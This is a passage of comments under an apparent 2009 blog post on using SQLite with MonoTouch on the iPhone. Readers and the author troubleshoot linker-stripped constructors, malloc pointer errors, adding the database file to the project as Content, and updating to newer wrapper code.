With the new enhancements, will I be continuing to use 64-bit native DLLs in Any CPU add-ins for 32-bit Excel?

How am I supposed to use it in Visual Studio if there are no project templates for .NET Core?

The ".NET Framework 4.8 Developer Package" breaks all of my VB WPF projects. The "Application" tab of project properties displays an error: "An error occurred trying to load the page. The method or operation is not implemented.". I have to roll back to .NET Framework 4.7.2 to continue my work 🙁 Have you tested it with VB projects before releasing?

Same problem here 🙁 … VB too … soooo many bugs in VS, please do not introduce new bugs 🙁 thanks, Morten Jonsen

Thank you for reporting this issue. We are working on the fix in VS. Meanwhile, we have documented a workaround for it on the developer community.

Thank you for reporting it! The link is fixed now.

Does .NET 4.8 support C# 8? A little bit confused how the .NET Framework version correlates with the C# language version.

No, C# 8 is only supported by .NET Core. That is discussed here. C# 8 relies on features that must be implemented by the runtime (e.g. ranges) and that functionality isn't being added to .NET Framework 4.8.

Hello guys, last year you stated in a blog post that the .NET Framework 4.8 will include a modern browser. But I'm unable to find anything like that in the release notes. Any updates on this?
(or have I been looking in the wrong place)

They probably changed that, now that Edge is switching to Microsoft Chrome.

Build Tools + VS 2019 Installer not supporting .NET 4.8? When will the Visual Studio Installer have .NET 4.8 as an available payload/component? This is highly confusing – I'd like to be able to use 4.8 on headless build agents.

I am wondering the same!

If you install the 2019 Build Tools and then install the .NET 4.8 Developer Pack you should be good to go, as I've verified it working in my environment. You can download it here.

Hi! I'm a newbie programmer and I want to use .NET to develop a web app for my website… Is that even possible?

Will 4.8 be available to deploy via WSUS as previous frameworks have been made available? No rush. I just want to confirm that it is coming to WSUS. In other words, I want to be able to approve the install of 4.8 on a Windows Server 2019/2016/2012R2 server, as well as Windows 10/7 desktops, through WSUS (I used to be able to do this).

I have been using TLS 1.2 now for several months. Now I want to switch to TLS 1.3. My server- and client-side code snippets look like this. This works.

((SslStream)comStream).AuthenticateAsServer(serverCertificate, true, SslProtocols.Tls12, checkCertificateRevocation: true);
((SslStream)comStream).AuthenticateAsClient(serverName, certs, SslProtocols.Tls12, true);

My assumption is that to now use TLS 1.3, all I need to do is change the SslProtocols value as shown below. However, the AuthenticateAsClient now throws an exception of "The client and server cannot communicate, because they do not possess a common algorithm". This is happening even when the client and server are running on the same machine. Again: using TLS 1.2 works just fine. Any suggestions? There does not seem to be any documentation out there yet.
🙁 Thank You

((SslStream)comStream).AuthenticateAsServer(serverCertificate, true, SslProtocols.Tls13, checkCertificateRevocation: true);
((SslStream)comStream).AuthenticateAsClient(serverName, certs, SslProtocols.Tls13, true);

Hello Ben, I believe that TLS 1.3 is not yet supported by the OS; that's why it does not work for you. First wait for the OS to support TLS 1.3 by default (there are some reg-key options AFAIK), then try the code above with Tls13. I believe that should just work then.

Can you please open a GitHub issue and provide details?

Hi, where can I find the 64-bit version of NGEN.EXE (.NET 4.8) after installing the .NET 4.8 runtime or SDK? When I entered this in the Developer Command Prompt: install ClientApp.exe I get this message:

Microsoft (R) CLR Native Image Generator – Version 4.8.3752.0
Failed to compile ClientApp.exe because this image is a 64bit assembly; try using 64bit ngen instead.

Regards, Robert

Hello, do you know why the UseLegacyFipsThrow switch for VSTO add-ins is set to true (old behavior) by default? Was it intentional? All other project types I tested use the new policy as default. Thanks, Alain

Ah, I think I've found it.
It doesn’t show up in the “Individual components” tab, just as a “Workload”, which is why I couldn’t find it.
https://devblogs.microsoft.com/dotnet/announcing-the-net-framework-4-8/?utm_source=t.co&utm_medium=referral
As you have already seen in the introduction to this chapter, RSS 1.0 differs from RSS 2.0 and Atom insofar as its vocabulary remains restricted to the core of the language. However, it doesn’t fall short in its expression, because it is extensible through modules in many ways. The developers of the standard accepted three core modules with the RSS 1.0 vocabulary. These are components of the language although they belong to different namespaces. A considerable number of additional modules have been suggested until today. The modularization made RSS 1.0 a frontrunner among the XML vocabularies. It wasn’t until years later that other XML dialects, like Scalable Vector Graphics (SVG) and Synchronized ...
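As a concrete illustration of the module mechanism (a hypothetical fragment, not from the book: the Dublin Core module is one of the accepted core modules, and its elements enter the feed through their own namespace alongside the RSS 1.0 core):

```xml
<rdf:RDF
  xmlns:
  xmlns="http://purl.org/rss/1.0/"
  xmlns:
  <item rdf:
    <title>Example entry</title>
    <link>http://example.org/entry</link>
    <!-- Elements below come from the Dublin Core module, not the RSS 1.0 core -->
    <dc:creator>Jane Doe</dc:creator>
    <dc:date>2005-06-01</dc:date>
  </item>
</rdf:RDF>
```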
https://www.oreilly.com/library/view/rss-and-atom/9781904811572/ch03s05.html
Paint Your Github Profile with Serverless

I'm often asked things like "What should I make?" or "Where do the ideas come from?". I've covered how I generate ideas before. The gist being, write down all your ideas, great or small. This works great for demos. But what about when you want to learn something a little more applied? Like putting together a project or trying out more tools.

One thing I advocate is building tools. Tools that you want to use. Tools that solve a problem for you. That's right, make for yourself. This has many benefits:

- You're invested in the idea.
- You get to learn many things to solve your problem.
- You have something to show potential employers/clients that's different.

That last point could be particularly useful. Interesting side projects make for good talking points. I can't tell you how many times I've had comments because of my Github profile. Because the hiring staff check it out and see an image painted in the contributions graph.

Today, we're going to walk through a project I made last year. "Vincent van Git" gives you a way to paint your Github contributions graph. I want to cover the "What?", the "Why?", and the "How?".

What?

As mentioned above, "Vincent van Git" helps you paint your Github contributions graph. It's a web app that generates a shell script for you to run on your machine. The result is that you populate your graph with commits that paint a picture. Over time (around 3 months), that picture will move and you'll need to recreate it.

Why?

This part's split into two, "Why make it?" and "Why make it?" ha.

First. Before making "Vincent", I'd always used the package "gitfiti". It's a command-line tool for applying graffiti to your contributions graph. It uses Python and you draw images with Arrays.
```python
KITTY = [
  [0,0,0,4,0,0,0,0,4,0,0,0],
  [0,0,4,2,4,4,4,4,2,4,0,0],
  [0,0,4,2,2,2,2,2,2,4,0,0],
  [2,2,4,2,4,2,2,4,2,4,2,2],
  [0,0,4,2,2,3,3,2,2,4,0,0],
  [2,2,4,2,2,2,2,2,2,4,2,2],
  [0,0,0,3,4,4,4,4,3,0,0,0],
]
```

If you squint hard enough, you'll see the kitty. It's a great tool, don't get me wrong. But, the fact it's a non-visual tool for a visual result made it tricky for me to use. Now, I could've created a front end to generate that Array. And then used it with gitfiti. But, why stop there? Why not have a go at creating my own version from scratch?

This leads us to the second "Why?". Because there's an opportunity to learn a variety of different tools here. There's also the opportunity to try new things out. And this goes back to the point we made in the introduction. With side projects that aren't the norm, you get to solve problems that aren't the norm. And that will help you develop your skills as a problem solver.

Before diving into the things learned and how, here are some of the things I got to try out more. They aren't likely to pop up in a tutorial CRUD app. That's not to say we shouldn't follow those tutorials when we're starting out. But, when we start looking for "What's next?", there are advantages to being adventurous.

How?

It's time for "How?". I'm going to break this part down into different sections. I won't dig in too deep but I will go over how certain things are possible. The talking points so to speak.

Electron

I had it in my head I wanted to create an electron app for "Vincent". A desktop app I could fire up, draw something, and hit "Submit". It didn't pan out that way but that's how it started. And this was a key part of the project. I had chosen to use electron because I wanted to make a React app that could use Node on the user's machine. That would provide a way to invoke "git" from within electron.
I hadn't played with this idea much before but it was a chance to get familiar with the ipcRenderer. That's a way you can communicate between the renderer and the main process. That means you can hit a button in React world and fire a function in Node world. I put together this repo that shows how this is possible. On OSX, if you press a message button in the front end, it uses say on the command line to read out the message.

Front End

I had a good idea of what I wanted here. We needed a grid that resembled the Github contributions graph. A user can use their pointer to paint the grid. Each cell can either be transparent or one of four shades of green. Here's what the final grid looks like.

The tricky part with these types of interaction and React is that we don't want to update the state on every paint. That would cause lots of rerendering. Instead, we can use refs to keep track of what's going on. Making something different challenges us to use the tools we use in a different way. Something like Vincent is great for working with DOM manipulation and React. I've done this for other projects too like "PxL". This part of the project was all about generating the Array we mentioned earlier. We're giving the user a way to generate the Array of digits from 0 to 4 without having to type it out.

Web Scraping with Serverless

Now, what makes "Vincent" possible is empty commits. The way it works is that we generate hundreds of empty commits and commit them to a repository of your choice. And those empty commits show up in the contribution graph. How do you get the four different greens? Well, this depends on the amounts of commits. For example, if we say your max commits per year is 100. Then to get the 4 levels, we can use 400, 300, 200, and 100 commits per day. That will generate the four shades of green. The main thing we need is the max number of commits for the username. To grab that we make some checks and then scrape the activity page on Github.
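The level-to-shade mapping described above (a drawing level multiplied by the user's max daily commit count, giving 100/200/300/400 for a max of 100) can be sketched as a small pure function. This helper is illustrative, not from the project's source:

```javascript
// Map a drawing level (0-4) to the number of empty commits needed for
// a day, given the highest daily commit count scraped for the user.
const commitsForLevel = (level, maxDailyCommits) => {
  if (!Number.isInteger(level) || level < 0 || level > 4) {
    throw new RangeError('level must be an integer from 0 to 4')
  }
  // Level 0 paints nothing; levels 1-4 step up in multiples of the
  // max, producing the four shades of green on the graph.
  return level * maxDailyCommits
}

console.log(commitsForLevel(1, 100)) // 100
console.log(commitsForLevel(4, 100)) // 400
```

The same multiplication shows up later in processCommits as LEVEL * multiplier.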
In "Vincent", we ask for a user name, branch name, and repository name. "Vincent" checks that they exist and that they're empty before scraping for commits. We're making about 4 or 5 requests here. This is where serverless comes in handy. We can put those requests into a Netlify function and then the front end only needs to make one request.

This is the important part of that function. Here we make a request for the "contributions" page. And then we use cheerio to scrape for the highest amount of commits over the last year.

```javascript
const getCommitMultiplier = async (username) => {
  // Grab the page HTML
  const PAGE = await (
    await fetch(`https://github.com/${username}/contributions`)
  ).text()
  // Use Cheerio to parse the highest commit count for a day
  const $ = cheerio.load(PAGE)
  // Instantiate an Array
  const COUNTS = []
  // Grab all the commit days from the HTML
  const COMMIT_DAYS = $('[data-count]')
  // Loop over the commit days and grab the "data-count" attribute
  // Push it into the Array
  COMMIT_DAYS.each((DAY) => {
    COUNTS.push(parseInt(COMMIT_DAYS[DAY].attribs['data-count'], 10))
  })
  // console.info(`Largest amount of commits for a day is ${Math.max(...COUNTS)}`)
  return Math.max(...COUNTS)
}
```

You could create a local version of this too and parse the response. Try making that request with your own username.

Generating a Shell Script

Next up we need a shell script to push all these generated empty commits. This part is about creating a big string in a loop. For every commit, we are assigning a date and many commits based on the draw level. The first part requires the use of luxon (we don't need moment.js anymore) to match dates to commits. There is a little Math around the dates that was a little tricky on the first couple of tries. But once it's sussed, you're good!
```javascript
const processCommits = async (commits, multiplier, onCommit, dispatch) => {
  const TODAY = DateTime.local()
  const START_DAY = TODAY.minus({ days: commits.length - 1 })
  let total = 0
  let genArr = []
  for (let c = 0; c < commits.length; c++) {
    const LEVEL = commits[c]
    const NUMBER_COMMITS = LEVEL * multiplier
    total += NUMBER_COMMITS
    genArr.push(NUMBER_COMMITS)
  }
  // Dispatch a message.
  dispatch({
    type: ACTIONS.TOASTING,
    toast: {
      type: TOASTS.INFO,
      message: MESSAGES.TOTAL(total),
      life: 4000,
    },
  })
  // Loop through the commits matching up the dates and creating empty commits
  for (let d = 0; d < genArr.length; d++) {
    // Git commit structure
    // git commit --allow-empty --date "Mon Oct 12 23:17:02 2020 +0100" -m "Vincent paints again"
    const COMMITS = genArr[d]
    if (COMMITS > 0) {
      const COMMIT_DAY = START_DAY.plus({ days: d })
      for (let c = 0; c < COMMITS; c++) {
        onCommit(COMMIT_DAY.toISO({ includeOffset: true }))
      }
    }
  }
}
```

Once we have all the commit data ready, it's time to generate that script. It's a long string based on the commit dates, the username, branch, etc.

```javascript
const generateShellScript = async (
  commits,
  username,
  multiplier,
  repository,
  branch,
  repoPath,
  dispatch
) => {
  let SCRIPT = `mkdir ${repoPath}
cd ${repoPath}
git init
`
  await processCommits(
    commits,
    multiplier,
    (date) => {
      SCRIPT += `git commit --allow-empty --date "${date}" -m "Vincent paints again"\n`
    },
    dispatch
  )
  SCRIPT += `git remote add origin https://github.com/${username}/${repository}.git\n`
  SCRIPT += `git push -u origin ${branch}\n`
  SCRIPT += `cd ../\n`
  SCRIPT += `rm -rf ${repoPath}\n`
  return SCRIPT
}
```

Ditching Electron

"Wait. I thought you wanted to use electron?" – Reader

I did. I got quite far with it. But, I hit some blockers, and that's OK. The issues were around pushing the commits via Node. It would take a long time and sometimes run out of buffer. The other issue was that I couldn't communicate this to the front end in a clean way. This is why I started generating the shell scripts.
And I'd started digging in with electron-dl and electron-store when it hit me. "This belongs on the web". I'd only read up on how to package a desktop app for different platforms and it looked OK. But, from testing and feedback, there were some issues already with Windows. There was also the factor of usability. This isn't a tool you use every day. And the web is more accessible than downloading and installing an app, etc. I decided to ditch electron at this point. And this is where React is great. Because I'd created various building blocks for the front end, it was painless to port those into a web app.

Was it a waste of time? No! Because I didn't use electron for the final product, doesn't mean it was a waste of time to try. In fact, I learned a lot about electron in a short space of time which was neat.

UI Fun

At this stage, I had a working proof of concept 🙌 Now I could have some fun with it and put together all the conveniences for users. A form to configure, the ability to save and load drawings, animations, etc. These are the things that stood out for me.

Configuration

I needed forms for configuration. Somewhere for a user to put their username, branch, and repository information. But, I also wanted to create a sliding drawer effect. For form handling, I could've reached for formik or created the form handling myself. But instead, I thought I'd give react-hook-form a try and it was great. It was another opportunity to try something different. Here's how the sliding drawer looks.

The other benefit to building things like this is that you can look for patterns to refactor. This drawer became a reusable component. I reuse it for an "info" drawer on the right side in the app.

Audio

I like to add a little whimsy to my projects. It's something people associate with me. Sound was a must and I hooked up some button clicks and actions to audio with a quick custom hook.
```javascript
import { useRef } from 'react'

const useSound = (path) => {
  const soundRef = useRef(new Audio(path))
  const play = () => {
    soundRef.current.currentTime = 0
    soundRef.current.play()
  }
  const pause = () => soundRef.current.pause()
  const stop = () => {
    soundRef.current.pause()
    soundRef.current.currentTime = 0
  }
  return {
    play,
    stop,
    pause,
  }
}

export default useSound
```

But, the real joy would be audio when painting the grid. I wanted to try out Tone.js some more after seeing it on "Learn with Jason". And this seemed like a great opportunity. Different levels play different notes. Erasing plays a dull note.

Toasts

The app needed some little toast components to let the user know what's happening. For example, confirming a save or telling the user that the commits are being generated. I could've reached for off-the-shelf ones. But, I couldn't remember making any myself in open source. This felt like a good opportunity to do that. With a little React and GreenSock, I had a nice Toasts component.

The neat thing about creating a Toast component is that it makes you think more about components. You need to use the state to trigger creation. But, you don't tie state to the Toasts. It's worth checking the code on that one.

Animation

I love to put some animation somewhere. And with this being my own project I can put as much as I like in. What better than a loading animation when the shell script gets generated? Playing on the project name and writing code, I settled on this. Some audio and 8-bit style music tops it off!

Zip Files

If you try and download a shell script for users, you're prompted with a security warning. It's not something I've needed to do before and this was new to me. The audience on live stream suggested trying out jszip. And this solved a problem in a neat way. Using jszip I could bundle a README and the shell script for the user and have them download a single zip file.
This way the user has instructions to run the file too.

```javascript
const FILE = new zip()
FILE.file('vincent-van-git.sh', SCRIPT)
FILE.file('README.md', README)
const ZIP_FILE = await FILE.generateAsync({ type: 'blob' })
downloadFile(ZIP_FILE, 'vincent-van-git.zip')
```

This was convenient and another opportunity to try something new that I wouldn't have.

That's It!

I deployed it, made a quick video, and shared it! All the code is open source. And you can use the app to paint commits to your Github profile with serverless. I learned a bunch from creating "Vincent van Git". And it solves a problem for me. There were techniques for me to try and opportunities to try out different packages.

What's the actionable advice here?

Make for yourself. That's the actionable advice here. Make something that you will find useful. Make a tool or something you're interested in. It could solve a particular problem for yourself. It will likely solve a problem for others too. And it gives you an outlet to learn and try new things.

Make for yourself.
https://jhey.dev/writing/paint-your-github-profile-with-serverless/
Unlike static methods, class methods are bound to a class. So, we don't have to create an instance or object of a class to call a classmethod. A Python classmethod receives cls (the class) as an implicit first argument, just like a normal method receives self as the first argument. This cls allows you to access the class variables, methods, and static methods of the class.

You can define any method as a Python classmethod by using the @classmethod decorator or the classmethod() function. Either way will work, but it is always advisable to go for the first option. Before we get into the example, the syntax of the Python classmethod is as shown below:

    class A:
        @classmethod
        def function_name(cls, arg1, arg2, ...):
            ....

Or

    class A:
        def function_name(cls, arg1, arg2, ...):
            ....

    A.function_name = classmethod(function_name)

You can call the class method using ClassName.MethodName() or ClassName().MethodName(). Both ways will return the classmethod result. In this article, we will show you how to create or define a classmethod in the Python programming language using @classmethod and classmethod(), with examples.

Python classmethod using Decorator

In this example, we are creating a class method called message using the @classmethod decorator. Within this method, cls.__name__ returns the class name (Employee) and cls.company returns the class variable company value (Tutorial Gateway).

    # Python Class Method
    class Employee:
        company = 'Tutorial Gateway'

        @classmethod
        def message(cls):
            print('The Message is From %s Class' % cls.__name__)
            print('The Company Name is %s' % cls.company)

    Employee.message()
    print('-----------')
    Employee().message()  # Other way of calling classmethod

OUTPUT

Python classmethod using classmethod() function

Here, we are using the classmethod() function to create a class method. In the code below, the Employee.printValue = classmethod(Employee.printValue) statement converts the method into a class method.
    class Employee:
        value = 100

        def printValue(cls):
            print('The Value = %d' % cls.value)

    Employee.printValue = classmethod(Employee.printValue)
    Employee.printValue()

OUTPUT

Call Static Method from classmethod in Python

In this example, we will show you how to call static methods from within a class method. Here, we created a static method called func_msg() which prints a welcome message. Next, we defined the message class method that prints the class variable company and the class name. Within the same function, we are calling the static method using cls.methodname.

    class Employee:
        company = 'Tutorial Gateway'

        @classmethod
        def message(cls):
            print('The Company Name is %s' % cls.company)
            print('The Message is From %s Class' % cls.__name__)
            cls.func_msg()

        @staticmethod
        def func_msg():
            print("Welcome to Python Programming")

    Employee.message()

OUTPUT

Here, instead of printing a message, we are finding the sum and average. First, we created a static method that accepts three arguments and returns the sum of those three. Next, we defined a Python classmethod that calls the static method using cls. Within the class method, it returns the average of the static method result.

    class Employee:
        company = 'Tutorial Gateway'

        @staticmethod
        def add(a, b, c):
            return a + b + c

        @classmethod
        def avg(cls):
            x = cls.add(10, 20, 40)
            return (x / 3)

    average = Employee.avg()
    print('The Average Of three Numbers = ', average)

OUTPUT

Alter class variable using classmethod in Python

In this example, we are going to create a class method that accepts an argument and assigns the value to the class variable. It means, when you call this method, it will replace the company text with the new text that you provide as an argument value. This helps to hide the class variables, and allows the end users to work with the class variable.
    class Employee:
        company = 'Tutorial Gateway'

        @classmethod
        def func_newName(cls, new_Name):
            cls.company = new_Name

    emp = Employee()
    print(Employee.company)
    print(emp.company)
    print('----------')
    Employee.func_newName('Python')
    print(Employee.company)
    print(emp.company)

OUTPUT

Real-time Examples of classmethod in Python

For example, if our client is receiving the Employee information in a long string, with the details separated by - (or any other delimiter), then instead of performing splitting operations on their end, we can create a classmethod and allow them to use it. In this Python classmethod example, we initialised fullname, age, gender and salary. Next, we created a classmethod that will split the given string based on - and return those values.

TIP: I suggest you refer to the Python split string article to understand the split function.
class Date: def __init__(self, day = 0, month = 0, year = 0): self.day = day self.month = month self.year = year @classmethod def string_to_Date(cls, string_Date): day, month, year = map(int, string_Date.split('-')) return cls(day, month, year) dt = Date.string_to_Date('31-12-2018') print(dt.day) print(dt.month) print(dt.year) OUTPUT Thank You for Visiting Our Blog
https://www.tutorialgateway.org/python-classmethod/
Most C/C++ programmers have likely made use of the __FILE__ and __LINE__ macros in their source files. They are provided by C/C++ compilers for outputting the file and line number of a particular line of code, usually for debugging purposes. I use this a lot with exceptions targeted at trapping bugs. For instance:

    class BugException {
    public:
        BugException(const string& mm, const string& ff, int ll)
            : msg(mm), file(ff), line(ll) {}
        const string msg;
        const string file;
        const int line;
    };

which I can use as:

    void doSomething() {
        // ... fail some bug-trapping test
        throw BugException("i should be > j", __FILE__, __LINE__);
    }

    int main() {
        try {
            doSomething();
        }
        catch (BugException& be) {
            cerr << "*** Bug: " << be.msg << " at file " << be.file
                 << ", line " << be.line << endl;
        }
    }

One type of debugging info that I often wish the compiler provided is the name of the function or method to which a line of code belongs, something that might be called __FUNCTION__:

    class Foo {
    public:
        void bar() {
            cout << "Inside method " << __FUNCTION__ << endl;
        }
    };

with the following output: "Inside method void Foo::bar()". This would be handy when one needs to verify, say, the calling order of some functions or methods, or to check that some methods are or are not called. It is not always practical to use debuggers since this most often requires tedious settings of breakpoints, button presses, etc. instead of just running the program in debug mode and examining the output. The only compiler that seems to offer this kind of macro is gcc. For those unfortunates among us who do not get to use open source compilers such as gcc, there is no way of getting the compiler to generate the output of __FUNCTION__ automatically. Instead, I have had to resort to tricks like:

    #include "Foo.h"

    void Foo::bar(int a) const {
        cout << "In method Foo::bar(int) const" << endl;
        // do stuff ...
}

Replacing the Foo:: part of the debug output with a call to typeid(*this).name() does not improve the matter much: it is starting to look messy, requires even more typing, and it is not the class name that changes most often, but the method signature itself, including the method's name. I discovered the hard way that good will and vigilance were not enough: the debug info rapidly gets out of sync with the actual class interface, especially when the software is reviewed, extended or debugged. No big deal, but it has led to some confusion.

After posting a question about this to the ACCU-general mailing list and getting several interesting answers, it was clear that there was no real support for this kind of debugging information, and I would have to design my own. But it was also clear, using bits and pieces mentioned in several posts, mixed in with a little OOD, that a pretty decent, if not perfect, solution was within reach. The essence is to use typeid() on the function or method pointer, something first suggested by Jon Jagger. The pitfall is that you need to make a few substitutions in its output before you can really get something useful. The above example becomes (I define TypeID later):

// #include "Foo.h"

void Foo::bar(int a) const {
    cout << "In method " << TypeID::fn(bar, "bar") << endl;
    // ...
}

The onus is still on me to keep the second argument in sync with the function/method name (the compiler will notify me if the first one does not correspond to a function/method), but this is clearly far less work than having to worry about the whole function/method declaration. It is also fairly concise and clear.

There are many possible ways of implementing TypeID so I will only discuss one possibility. I implemented TypeID as a namespace that groups and provides type information functionality. I first implemented it as a class with static methods, with some of the methods as inline and private to hide some implementation details.
However, given the context of use (debugging), inlining is not really important, and I was hoping to avoid having to create temporary objects, so I ended up implementing it as a namespace. In this case, static methods are no longer necessary (they become merely functions), neither are visibility qualifiers, and this probably reflects better the fact that no member data is involved. The header file for TypeID is simply:

// file TypeID.hh
namespace TypeID {
    template <typename T>
    std::string fn(const T& fptr, const std::string& name);
}

whereas the source file hides the implementation details:

// file TypeID.cc
#include <typeinfo>

namespace TypeID {
    void simplify(std::string& fs);
    std::string& insertName(std::string& fsig, const std::string& fname);

    template <typename T>
    std::string fn(const T& fptr, const std::string& name) {
        std::string fsignature = typeid(fptr).name();
        simplify(fsignature);
        return insertName(fsignature, name);
    }

    void simplify(std::string& fs) {
        // do simplifications like
        // fs.replace("basic_string<...>", "string");
    }
}

std::string& TypeID::insertName(std::string& routine, const std::string& name)
{
    std::string::size_type i = routine.find_first_of('(');
    if (i == std::string::npos) // probably not a function
        return routine;
    routine.replace(i, 1, " ");
    i = routine.find_first_of('*', i);
    routine.replace(i, 1, name);
    i = routine.find_first_of(')');
    return routine.erase(i, 1);
}

The fn routine consists, quite simply, of three steps: get the signature of the function pointer passed as first argument; simplify it; and finally, insert the function name given as second argument. The latter is done by insertName, which has to find where to put the name in the signature. The rule I have used is to find the first '*' after the first left parenthesis. I really do not know how universal this is. Therefore, insertName may have to be modified slightly for different compilers (so maybe TypeID should be a class after all and the method made virtual).
The simplification step is fairly important due to the very long names that can be produced when STL types appear as arguments to the function/method given as first parameter to TypeID::fn. Clearly, simplify will vary depending on your application, on personal preferences, and so forth. In the above code sample, I used a line of pseudocode to represent one possible type of simplification that could occur. Again, customizing the simplify routine might be a good enough reason to implement TypeID as a class.

Finally, it is interesting to note that no check is done on what is passed to TypeID::fn. It could be given a pointer to a method or an object; it would still chug away without complaining, but probably produce meaningless output. Again, given the context of use (debugging), worrying about this level of detail is probably overkill.

There are many ways that this could be extended or improved. Having a class with virtual functions for simplify and insertName would allow for easier customisation, though it would require creating an object. In addition, methods/routines could be added that split the function signature into several parts and make each available separately. With a class instead of namespace, you could do things like:

// #include "Foo.h2"

void Foo::bar(int a) const {
    static const TypeID_sgi method(bar, "bar");
    cout << "In method " << method.name()
         << "\nMethod parameters " << method.params() << endl;
    // ...
}

where TypeID_sgi is, hypothetically, a subclass of TypeID customised for SGI's MipsPro compiler. If others have any suggestions for improvement or ideas for alternatives, I would be happy to hear from you.
https://accu.org/index.php/journals/462
CC-MAIN-2019-22
refinedweb
1,207
53.21
To communicate with the device we need the internal IP + MAC. The protocol is pretty simple, but as of today this kind of device is not fully supported — it is, however, really easy to implement.

[python]
import broadlink

# set these variables
strHost = 'xxx.xxx.xxx.xxx'  # ip device
strMac = 'xx:xx:xx:xx:xx:xx'  # mac device

# other stuff:
strType = '0x4ead'  # HYSEN THERMOSTAT TYPE

# convert mac string
macbytes = bytearray.fromhex(strMac.replace(':', ''))

# get the broadlink hysen device
device = broadlink.hysen((strHost, 80), macbytes, strType)

# get auth for further communications
device.auth()

# from now on you can talk with the device, for example read the complete status:
data = device.get_full_status()

# do whatever you want with data :)

Sample implementations:
- Broadlink communication protocol:
- nest-like knob codepen:

Next steps:
- implement the core features for an hysen device
- implement the "setter" code section
- clean code
- upload to github for public release

STAY TUNED!

Hello, it's great to be able to check beok from the web. Could you tell me how to do it? Where should I enter the python code?
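The MAC-to-bytes conversion above is easy to get wrong with stray separators. A small helper — my own sketch, not part of the broadlink API — validates the input first and accepts either ':' or '-' separators:

```python
def mac_to_bytes(mac):
    """Convert 'aa:bb:cc:dd:ee:ff' (or 'aa-bb-cc-dd-ee-ff') to the
    bytearray form that the broadlink device constructors expect."""
    hexdigits = mac.replace(':', '').replace('-', '').strip()
    if len(hexdigits) != 12:
        raise ValueError('MAC should contain exactly 6 bytes: %r' % mac)
    return bytearray.fromhex(hexdigits)

# illustrative MAC, not a real device
print(list(mac_to_bytes('78:0f:77:00:11:22')))  # -> [120, 15, 119, 0, 17, 34]
```

The result can be passed straight in as the macbytes argument in the snippet above.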
https://hackaday.io/project/162466-beok-bot-313w-thermostat-hack
CC-MAIN-2020-05
refinedweb
173
55.84
Red Hat Bugzilla – Bug 157312
no torrent rpms for fc2 and fc3
Last modified: 2009-08-05 14:42:15 EDT

From Bugzilla Helper:
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.7) Gecko/20050416 Fedora/1.0.3-1.3.1 Firefox/1.0.3

Description of problem:
It would be nice if the fedora distribution came with bittorrent since it's advertised on the fedora download page. If that's not possible, it would at least be nice if you provided rpms or at least links to trusted sites that had rpms for the current stable release. I could only find bittorrent rpms for legacy fedora releases on the "join the torrent" link at . I installed the rpm for fc1 on my fc3 machine and it didn't work. I had to search for the error I got:

Traceback (most recent call last):
  File "/usr/bin/btdownloadcurses.py", line 7, in ?
    from BitTorrent.download import download
ImportError: No module named BitTorrent.download

And found somebody who had the same problem. After setting some python path, I had another problem... it didn't seem to accept the arguments to bittorrent that were recommended on the duke torrent web site. So I tried getting rid of the max upload rate argument and it finally worked. But it shouldn't be that hard to download your releases using a tool you recommend on your download site IMHO.

Version-Release number of selected component (if applicable):

How reproducible:
Always

Steps to Reproduce:
1. Go to
2. Follow the link for "join the torrent"
3. Note the absence of torrent rpms for fc2 and fc3

Additional info:

*** Bug 158197 has been marked as a duplicate of this bug. ***

The most relevant page for Bittorrent (which is also linked from the Download page of the wiki) is currently:

I have just added to the page that Bittorrent is available as a package from Extras. Closing bug as FIXED RAWHIDE.

Tickets move to docs-request so the fedora-websites component can be removed per request from Ricky.
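The "setting some python path" the reporter mentions amounts to putting the rpm's install directory on the interpreter's module search path so the BitTorrent package can be found. A hedged sketch — the directory name below is purely illustrative, not the actual FC1 rpm layout:

```python
import sys

# Hypothetical location where the old rpm dropped the package; on a
# real system you would locate it with something like:
#   rpm -ql bittorrent | grep download
BT_DIR = "/usr/share/BitTorrent"

if BT_DIR not in sys.path:
    sys.path.insert(0, BT_DIR)

# after this, "from BitTorrent.download import download" has a chance
# of succeeding (assuming the package really lives under BT_DIR)
print(sys.path[0])
```

The same effect can be had without editing code by exporting PYTHONPATH before launching btdownloadcurses.py.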
https://bugzilla.redhat.com/show_bug.cgi?id=157312
CC-MAIN-2018-30
refinedweb
348
65.42
SQLite.cs and minor bugfixes.

Firstly, let me begin by saying this sample totally relies on the contribution of Frank Krueger, who posted the SQLiteClient.cs code to the MonoTouch mailing list:

"Here is the code. Consider it released into the public domain. If there's interest, I can start a Google code project or something."

Many thanks Frank! This is a VERY simple application using that library: it lists 'employees' from an SQLite database and allows you to call or email them:

* note: may not adhere to iPhone user interface guidelines!

The C# code itself can be downloaded (26Kb) or browsed below. This first sample only reads from SQLite on the iPhone - just a single database call:

using (var db = new SQLiteClient.SQLiteConnection("phonebook")) {
    db.Open();
    var users = db.Query<Employee>(
        "SELECT Firstname, Lastname, Work, Mobile, Department, Email FROM Phonebook ORDER BY Lastname", 1000);
    listData = users.ToList();
}

which queries data that was set up in the SQLite Database Browser and included with the application as a 'Content' file within the MonoTouch project.

It uses UITableViewDelegate, UITableViewDataSource and UIAlertViewDelegate implementations to populate the scrolling list and react to touch 'events'. When you touch a row, we use the OpenUrl method discussed previously to trigger a call or email. Future additions to this sample might include alphabetized sections, a search function and a proper 'user page' rather than using UIAlertView. Perhaps some hierarchical navigation and an online 'updater' function as well?

p.s. yes, I shouldn't have used INTEGER for the telephone numbers in SQLite... they seem to be overflowing. I will convert them to TEXT in a future post.

We are planning to do a similar application for distribution within our company in 2010. We would be interested in following the development of the sample and potentially contributing to its development.
Hey Tony, there'll be a few updates to this sample (I have some ideas) which will always be posted here or at conceptdevelopment.net.

I'm getting the following error when running a variation of this code:

Unhandled Exception: System.MissingMethodException: Method not found: 'Default constructor not found...ctor() of XactScope.Scope'.
  at System.Activator.CreateInstance (System.Type type, Boolean nonPublic) [0x00000]
  at System.Activator.CreateInstance (System.Type type) [0x00000]
  at System.Activator.CreateInstance[Scope] () [0x00000]
  at SQLiteClient.SQLiteCommand+<ExecuteQuery>c__Iterator0`1[XactScope.Scope].MoveNext () [0x00000]
  at System.Collections.Generic.List`1[XactScope.Scope].AddEnumerable (IEnumerable`1 enumerable) [0x00000]
  at System.Collections.Generic.List`1[XactScope.Scope]..ctor (IEnumerable`1 collection) [0x00000]
  at System.Linq.Enumerable.ToList[Scope] (IEnumerable`1 source) [0x00000]
  at XactScope.AppDelegate.FinishedLaunching (MonoTouch.UIKit.UIApplication app, MonoTouch.Foundation.NSDictionary options) [0x0005a] in /Users/carlmouritsen/Projects/XactScope/Main.cs:49
  ... [0x00000]
